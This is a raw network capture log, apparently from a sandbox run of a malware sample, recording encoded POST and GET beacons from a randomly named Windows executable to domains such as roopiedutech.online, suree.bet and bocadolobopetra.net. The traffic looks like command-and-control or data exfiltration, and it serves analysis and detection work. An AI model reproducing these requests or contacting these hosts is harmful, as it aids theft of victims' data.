                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4b 5a 71 41 50 4c 30 36 4f 49 39 4f 79 75 6c 32 63 51 47 62 58 35 72 67 49 6a 34 6a 61 79 44 4a 4d 37 79 32 59 4a 6f 47 6d 6a 54 76 69 30 33 75 35 48 63 2b 51 69 64 4c 64 50 47 35 72 54 7a 74 36 42 64 32 4a 70 52 7a 33 61 32 4f 38 41 33 66 7a 45 39 6d 34 4e 4e 43 39 2f 4a 35 76 71 71 30 77 2b 54 61 36 6d 50 70 39 30 72 77 52 30 43 2f 63 54 6e 53 45 74 77 54 4b 57 72 31 37 61 33 66 72 4a 77 43 35 48 4f 65 57 42 2f 37 71 56 64 34 54 42 64 63 70 31 76 52 76 4b 74 53 57 77 59 5a 38 37 75 64 68 73 77 69 45 4e 4b 37 32 48 46 57 48 43 4f 36 57 35 42 75 46 6b 42 62 4d 59 38 74 44 44 58 6e 6f 2f 4a 79 53 39 71 6b 4d 46 7a 72 2f 51 41 61 4b 4f 6b 3d
                                                                                                                              Data Ascii: Z0WTZ=KZqAPL06OI9Oyul2cQGbX5rgIj4jayDJM7y2YJoGmjTvi03u5Hc+QidLdPG5rTzt6Bd2JpRz3a2O8A3fzE9m4NNC9/J5vqq0w+Ta6mPp90rwR0C/cTnSEtwTKWr17a3frJwC5HOeWB/7qVd4TBdcp1vRvKtSWwYZ87udhswiENK72HFWHCO6W5BuFkBbMY8tDDXno/JyS9qkMFzr/QAaKOk=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.449221103.191.208.137803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:22.588608027 CET10906OUTPOST /w5is/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Origin: http://www.roopiedutech.online
                                                                                                                              Referer: http://www.roopiedutech.online/w5is/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 4b 5a 71 41 50 4c 30 36 4f 49 39 4f 79 75 6c 32 63 51 47 62 58 35 72 67 49 6a 34 6a 61 79 44 4a 4d 37 79 32 59 4a 6f 47 6d 6a 62 76 68 46 58 75 34 6d 63 2b 52 69 64 4c 63 50 47 34 72 54 7a 4b 36 46 35 79 4a 70 64 46 33 5a 65 4f 39 69 50 66 37 57 46 6d 79 4e 4e 43 69 76 4a 38 68 4b 71 62 77 39 37 47 36 6d 2f 70 39 30 72 77 52 33 71 2f 53 53 6e 53 58 39 77 51 64 6d 72 78 2f 61 33 37 72 4a 49 53 35 48 37 6c 57 52 66 37 70 31 4e 34 55 7a 6c 63 68 31 76 54 6a 71 74 4b 57 77 45 38 38 37 62 6d 68 73 30 45 45 50 57 37 31 44 49 50 44 69 65 6b 49 50 4e 47 56 56 78 52 4e 4f 39 67 61 54 50 5a 67 4e 64 30 50 38 72 50 50 43 50 76 36 51 51 62 49 4c 45 5a 46 58 44 2b 43 5a 34 48 6e 45 77 4b 4e 71 38 74 54 53 4d 2f 63 31 43 4f 55 4a 45 53 38 53 71 6c 6c 6f 33 43 51 53 61 6c 2f 2f 67 39 55 78 77 47 48 2f 59 4a 34 75 57 4c 74 71 41 54 66 76 31 66 52 36 37 32 65 59 5a 5a 76 38 45 5a 30 71 52 4a 6b 47 58 36 55 37 55 44 78 4d 51 76 78 43 41 4c 7a 6b 6b 78 61 75 69 6a 37 6e 69 46 39 32 38 34 63 4e 75 4c [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=KZqAPL06OI9Oyul2cQGbX5rgIj4jayDJM7y2YJoGmjbvhFXu4mc+RidLcPG4rTzK6F5yJpdF3ZeO9iPf7WFmyNNCivJ8hKqbw97G6m/p90rwR3q/SSnSX9wQdmrx/a37rJIS5H7lWRf7p1N4Uzlch1vTjqtKWwE887bmhs0EEPW71DIPDiekIPNGVVxRNO9gaTPZgNd0P8rPPCPv6QQbILEZFXD+CZ4HnEwKNq8tTSM/c1COUJES8Sqllo3CQSal//g9UxwGH/YJ4uWLtqATfv1fR672eYZZv8EZ0qRJkGX6U7UDxMQvxCALzkkxauij7niF9284cNuLCgC94h3JkRNyDoBKaEIRRiJVnjk6TQlNyYpXREdThBNU1WJy7CBVDf8K6RWHO/VJUB9sBC2zOMuSOh0hA8ilIQzq6/e3tQKxx86HtXyX31bw0Df+80YHMeJU0jRYkRgAk/A45atVI/pyQRpSKdb8oLu38q3bVcB3LMiuvnr7Pj2VejNPxf/QMXynd9QeFmOMh9HupgM01aAmFuSqMpFVlwyBQKKHe5zXFNvouLFJaTPRir1plIz9ZPZ/bmSrCwSLgKDTPmNzjiisYg4yXX7q2u8OrGVB++whYLxKszYLKlwEXB74oEPP9VHy6C+FpgHRm3scLL/hUyefFWxbtUVwho7jAbEuUlxg6v5nCkuALAszPLs8o+yiVfsn2QF+EzMuCiUPvpuPQg8YojvUJ1GQ/HayiF6nGkkSqNNPt3/cd3wOXEJwZ6tDxzaiSkK98Utb1zd1FBfFitMkjIgqcfD1qx2te9iVOizXrJEXQTM2EXeDmRzTqtHjk1fHFKs2vy4jyMiEsrNGRKJcjAtVBbzZzsFhJiTv+lqzr7YmtUmNtSC8tBa+h1Yrvo2OxoEg/cT8uGVvOVWVtracSBmTh6xQBsy50OFRma4csF4LZwtg+Gy84CMuHEO8hQddl2eN6L4VdzRVvvoRJl7LWhVJ/Rp+mVsM0vztrwg4kG [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              8192.168.2.449236103.191.208.137803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:25.127933025 CET532OUTGET /w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.roopiedutech.online
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:12:27.336199045 CET519INHTTP/1.1 301 Moved Permanently
                                                                                                                              Connection: close
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://roopiedutech.online/w5is/?Z0WTZ=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg=&SJuP9=UPQLWRgHAD_
                                                                                                                              x-litespeed-cache: miss
                                                                                                                              content-length: 0
                                                                                                                              date: Sat, 02 Nov 2024 07:12:27 GMT
                                                                                                                              server: LiteSpeed
                                                                                                                              vary: User-Agent


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              9192.168.2.4493203.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:41.014682055 CET774OUTPOST /mgme/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Origin: http://www.suree.bet
                                                                                                                              Referer: http://www.suree.bet/mgme/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 36 6e 6a 66 69 48 64 2f 38 52 69 6b 5a 71 30 39 66 73 6d 55 47 45 61 4e 52 33 4c 76 71 33 56 4e 73 31 6b 68 39 53 67 37 64 64 36 35 70 6b 37 76 4e 74 6d 67 2f 75 4f 4f 74 55 56 73 49 39 2f 77 55 65 2f 58 44 56 69 39 39 6d 58 47 30 7a 6e 42 6d 35 50 48 44 74 53 54 33 6a 68 31 4c 44 31 59 77 32 56 30 35 77 46 54 53 2f 6f 49 4d 4a 53 39 59 76 61 58 45 6a 42 74 53 6c 47 65 64 6f 4e 52 6c 64 35 72 32 33 55 74 65 6c 30 45 4a 72 2b 46 67 46 74 4b 6f 57 34 58 4d 70 51 38 31 32 46 56 78 5a 77 4a 57 44 78 6b 4b 74 75 67 35 77 50 72 6a 43 51 79 70 4d 56 61 6c 36 63 4b 79 56 74 31 64 77 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=6njfiHd/8RikZq09fsmUGEaNR3Lvq3VNs1kh9Sg7dd65pk7vNtmg/uOOtUVsI9/wUe/XDVi99mXG0znBm5PHDtST3jh1LD1Yw2V05wFTS/oIMJS9YvaXEjBtSlGedoNRld5r23Utel0EJr+FgFtKoW4XMpQ812FVxZwJWDxkKtug5wPrjCQypMVal6cKyVt1dw==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              10192.168.2.4493333.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:43.561191082 CET794OUTPOST /mgme/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Origin: http://www.suree.bet
                                                                                                                              Referer: http://www.suree.bet/mgme/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 36 6e 6a 66 69 48 64 2f 38 52 69 6b 5a 4b 45 39 64 4c 4b 55 52 55 61 4f 4e 48 4c 76 6a 58 56 57 73 31 59 68 39 54 56 67 61 76 65 35 70 47 6a 76 4d 73 6d 67 2b 75 4f 4f 6a 30 56 74 58 4e 2f 76 55 65 43 69 44 55 4f 39 39 6d 54 47 30 33 6a 42 6d 71 58 41 52 74 53 56 2f 44 68 7a 50 44 31 59 77 32 56 30 35 77 35 35 53 2f 67 49 4d 35 43 39 4b 62 32 51 4b 44 41 66 61 46 47 65 4b 34 4e 56 6c 64 34 34 32 7a 4d 48 65 67 6f 45 4a 72 75 46 67 58 46 46 68 57 34 56 44 4a 52 35 2b 31 67 66 7a 6f 31 59 56 69 64 6c 4b 4d 4f 79 78 57 43 78 79 7a 78 6c 37 4d 78 70 34 39 56 2b 2f 57 51 38 47 35 41 62 55 31 50 48 42 36 78 6f 38 43 73 47 71 53 38 5a 65 4f 6b 3d
                                                                                                                              Data Ascii: Z0WTZ=6njfiHd/8RikZKE9dLKURUaONHLvjXVWs1Yh9TVgave5pGjvMsmg+uOOj0VtXN/vUeCiDUO99mTG03jBmqXARtSV/DhzPD1Yw2V05w55S/gIM5C9Kb2QKDAfaFGeK4NVld442zMHegoEJruFgXFFhW4VDJR5+1gfzo1YVidlKMOyxWCxyzxl7Mxp49V+/WQ8G5AbU1PHB6xo8CsGqS8ZeOk=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              11192.168.2.4493433.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:46.103533030 CET10876OUTPOST /mgme/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Origin: http://www.suree.bet
                                                                                                                              Referer: http://www.suree.bet/mgme/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 36 6e 6a 66 69 48 64 2f 38 52 69 6b 5a 4b 45 39 64 4c 4b 55 52 55 61 4f 4e 48 4c 76 6a 58 56 57 73 31 59 68 39 54 56 67 61 76 57 35 70 7a 33 76 4e 50 2b 67 39 75 4f 4f 72 55 56 67 58 4e 2f 69 55 65 61 6d 44 55 54 41 39 6c 37 47 75 53 33 42 79 4c 58 41 4c 39 53 56 67 54 68 79 4c 44 31 4a 77 32 6c 77 35 32 5a 35 53 2f 67 49 4d 38 4f 39 61 66 61 51 61 7a 42 74 53 6c 47 61 64 6f 4d 79 6c 64 68 4e 32 7a 59 39 65 7a 77 45 4a 50 79 46 73 43 5a 46 75 57 34 54 50 70 52 66 2b 31 63 63 7a 73 56 55 56 69 59 41 4b 4d 36 79 30 52 76 63 31 48 35 61 35 50 4e 73 73 73 39 4b 2f 45 55 50 4c 59 6f 4a 62 77 62 6f 66 35 38 44 7a 31 39 57 37 69 67 69 4c 37 38 4f 68 43 30 51 54 66 43 36 69 54 36 71 5a 37 63 6f 6d 4a 63 62 6b 53 77 59 30 74 4b 6c 6b 42 31 6b 54 47 30 6a 6d 52 62 72 75 46 63 38 39 50 79 2f 4c 37 73 59 67 38 6b 6a 59 49 4d 6b 52 64 57 55 67 4d 46 4a 4e 43 6d 38 46 37 54 31 41 58 41 66 44 71 42 4c 78 58 52 43 54 4f 75 7a 39 42 50 54 6b 41 6e 74 4e 6e 56 51 46 69 37 6d 64 2b 6a 47 44 74 39 53 [TRUNCATED]
                                                                                                                              Data Ascii: Z0WTZ=6njfiHd/8RikZKE9dLKURUaONHLvjXVWs1Yh9TVgavW5pz3vNP+g9uOOrUVgXN/iUeamDUTA9l7GuS3ByLXAL9SVgThyLD1Jw2lw52Z5S/gIM8O9afaQazBtSlGadoMyldhN2zY9ezwEJPyFsCZFuW4TPpRf+1cczsVUViYAKM6y0Rvc1H5a5PNsss9K/EUPLYoJbwbof58Dz19W7igiL78OhC0QTfC6iT6qZ7comJcbkSwY0tKlkB1kTG0jmRbruFc89Py/L7sYg8kjYIMkRdWUgMFJNCm8F7T1AXAfDqBLxXRCTOuz9BPTkAntNnVQFi7md+jGDt9ShjnV0CjcyLeHR6KgVf1BOOmIe2qkEZv83QZspYsPWPj0Rf8oLkNHzjNtWAoDROCM1O+vCzUix1iwmjEB8xaPGBbufnyZmq2vEVOz9Wj8hmHtDfxJ262/KzdsEJ11gHMh34Jb2bzPNNXJrd5WjlkfmegKzrNvmQIic9mU6GG+5hEzqvtRvbrVI+w/EhQDz2VR3isn7YuR6gHtKzp47LfzRk5K9Sjk87d3kU7YUktIEtBq921867WjTlBaLDnDCEV2nh3/aDhazKYefYxnzsnwu4aZv4x5M2uWAehlsTD4/7C0v+Cbz/L9EUKzhD25r7cflVhWzRq49KlkqgUH9BTzvOefTNRzW+xULY7Nu5JCJy3FDzclx3Z0P8DYIkgP3YuQIqKDnKzf76G/74/5psCI/FXaK3FKjVX/xP/rTGlWjeC8X0acDTlsCM03fQGObg8YHTne92Eck+A+sOV0DakUHNzddZp8HPSqFVxnKusndT1nSar2eFIknGKTdJZvgXWZDbEuPuW7r7VWjcaMk64ccqFkLvr9Fe2AfsJTPkGQBoJLc7JogDMznthM45Ll7yfcZHzIYPU1jSuwIL6YkHhVbOTIi2pC01MVdlsX0Bhcy8qKC3K0O2P3Acis1wKb8u5OFBSVu54ca5KQK8TNJbAgypZ+lwZbL6wKRz [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              12192.168.2.4493523.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:48.642544985 CET522OUTGET /mgme/?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.suree.bet
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:12:50.203681946 CET399INHTTP/1.1 200 OK
                                                                                                                              Server: openresty
                                                                                                                              Date: Sat, 02 Nov 2024 07:12:50 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 259
                                                                                                                              Connection: close
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 30 57 54 5a 3d 33 6c 4c 2f 68 79 70 78 31 68 6d 79 57 4b 63 5a 4c 50 50 6a 49 33 79 30 44 57 7a 64 68 31 4d 71 6f 6d 39 55 2f 31 78 68 54 50 4c 71 75 46 58 4f 45 74 43 4f 6a 65 47 59 68 48 30 50 48 2b 61 75 56 4e 69 59 4b 6e 7a 4d 39 57 2f 75 6b 33 6d 69 37 59 62 6c 4a 75 4f 53 67 33 45 42 49 79 73 2b 2f 68 68 6b 31 31 30 78 61 4d 52 7a 43 2b 2b 59 65 63 4f 34 62 53 41 3d 26 53 4a 75 50 39 3d 55 50 51 4c 57 52 67 48 41 44 5f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Z0WTZ=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&SJuP9=UPQLWRgHAD_"}</script></head></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              13192.168.2.4493533.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:55.391976118 CET804OUTPOST /4q66/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Origin: http://www.bocadolobopetra.net
                                                                                                                              Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6f 73 6e 76 37 63 2f 41 32 37 63 46 55 35 67 52 4d 41 6c 61 6f 77 4f 34 67 63 33 69 63 75 51 52 6d 52 63 6f 56 4e 49 6b 63 36 37 4d 61 42 63 32 58 57 53 57 61 44 50 6a 58 2f 79 64 76 6c 72 4a 4c 75 67 53 67 31 53 49 4a 53 59 33 66 58 30 59 30 73 32 79 33 39 7a 76 76 4c 32 34 33 53 31 6d 5a 62 54 43 64 38 5a 6a 43 62 69 45 32 52 67 4b 39 35 4b 33 77 57 54 39 65 34 2f 2f 4b 76 45 4b 45 36 42 41 37 46 79 59 57 71 34 30 32 4e 71 74 5a 4f 2b 38 45 4d 46 30 41 69 57 2b 6d 72 7a 54 6a 31 67 72 77 5a 79 75 55 39 54 73 31 4e 32 34 71 64 57 53 2f 53 38 37 55 2b 74 6e 73 4a 75 43 55 51 3d 3d
                                                                                                                              Data Ascii: Z0WTZ=osnv7c/A27cFU5gRMAlaowO4gc3icuQRmRcoVNIkc67MaBc2XWSWaDPjX/ydvlrJLugSg1SIJSY3fX0Y0s2y39zvvL243S1mZbTCd8ZjCbiE2RgK95K3wWT9e4//KvEKE6BA7FyYWq402NqtZO+8EMF0AiW+mrzTj1grwZyuU9Ts1N24qdWS/S87U+tnsJuCUQ==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              14192.168.2.4493543.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:12:57.930365086 CET824OUTPOST /4q66/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Origin: http://www.bocadolobopetra.net
                                                                                                                              Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6f 73 6e 76 37 63 2f 41 32 37 63 46 53 61 49 52 4f 68 6c 61 6a 77 4f 35 38 4d 33 69 47 65 51 56 6d 52 51 6f 56 49 34 4f 63 49 76 4d 62 6b 34 32 46 6a 75 57 64 44 50 6a 63 66 79 69 79 31 71 46 4c 75 6c 6e 67 30 65 49 4a 53 63 33 66 53 51 59 31 66 75 78 32 74 7a 74 36 62 32 2b 7a 53 31 6d 5a 62 54 43 64 38 4d 45 43 62 36 45 33 6c 6b 4b 2b 62 69 77 78 57 54 36 55 59 2f 2f 63 66 45 30 45 36 42 6d 37 48 48 31 57 73 6b 30 32 49 57 74 59 63 58 4f 50 4d 46 79 45 69 58 6f 31 72 2b 32 72 46 35 64 39 6f 69 33 5a 2b 54 78 39 72 37 69 37 73 33 46 74 53 59 49 4a 35 6b 54 68 4b 54 4c 50 54 6a 39 61 56 50 6c 51 43 6c 5a 65 44 47 79 70 6d 75 34 59 67 38 3d
                                                                                                                              Data Ascii: Z0WTZ=osnv7c/A27cFSaIROhlajwO58M3iGeQVmRQoVI4OcIvMbk42FjuWdDPjcfyiy1qFLulng0eIJSc3fSQY1fux2tzt6b2+zS1mZbTCd8MECb6E3lkK+biwxWT6UY//cfE0E6Bm7HH1Wsk02IWtYcXOPMFyEiXo1r+2rF5d9oi3Z+Tx9r7i7s3FtSYIJ5kThKTLPTj9aVPlQClZeDGypmu4Yg8=


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              15192.168.2.4493553.33.130.190803512C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Nov 2, 2024 08:13:00.485275030 CET10906OUTPOST /4q66/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.bocadolobopetra.net
                                                                                                                              Origin: http://www.bocadolobopetra.net
                                                                                                                              Referer: http://www.bocadolobopetra.net/4q66/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Raw: 5a 30 57 54 5a 3d 6f 73 6e 76 37 63 2f 41 32 37 63 46 53 61 49 52 4f 68 6c 61 6a 77 4f 35 38 4d 33 69 47 65 51 56 6d 52 51 6f 56 49 34 4f 63 49 33 4d 62 57 77 32 55 30 36 57 63 44 50 6a 56 2f 79 6e 79 31 71 49 4c 71 42 72 67 30 43 2b 4a 52 30 33 64 78 6f 59 79 75 75 78 34 74 7a 74 69 72 32 37 33 53 30 38 5a 66 2f 65 64 38 63 45 43 62 36 45 33 6b 55 4b 70 5a 4b 77 38 32 54 39 65 34 2f 6a 4b 76 45 50 45 36 59 54 37 48 44 44 57 66 38 30 32 6f 6d 74 62 76 2f 4f 4e 73 46 77 4a 43 58 67 31 72 79 6c 72 46 6c 72 39 6f 57 4e 5a 35 6a 78 34 63 4b 64 6e 65 6a 6d 36 52 6f 61 4c 4b 55 46 6f 74 6a 32 48 67 6d 43 66 6e 57 38 43 7a 35 56 61 6b 7a 68 30 6a 75 6e 4e 77 45 6c 48 77 73 41 4a 56 51 77 69 6b 50 43 38 63 54 79 5a 67 42 50 72 50 5a 61 4f 69 4b 51 35 35 44 52 70 63 5a 6d 6e 7a 49 66 48 5a 44 6b 30 55 37 46 31 79 49 39 4f 75 4f 39 48 2b 79 67 48 2f 54 37 6d 30 63 55 69 68 2f 63 70 70 46 42 5a 6a 66 79 6b 69 70 70 50 71 6c 47 37 50 31 69 4a 67 32 4a 42 6a 67 59 31 62 68 58 4e 6b 41 35 76 65 6f 31 68 39 32 61 [TRUNCATED]
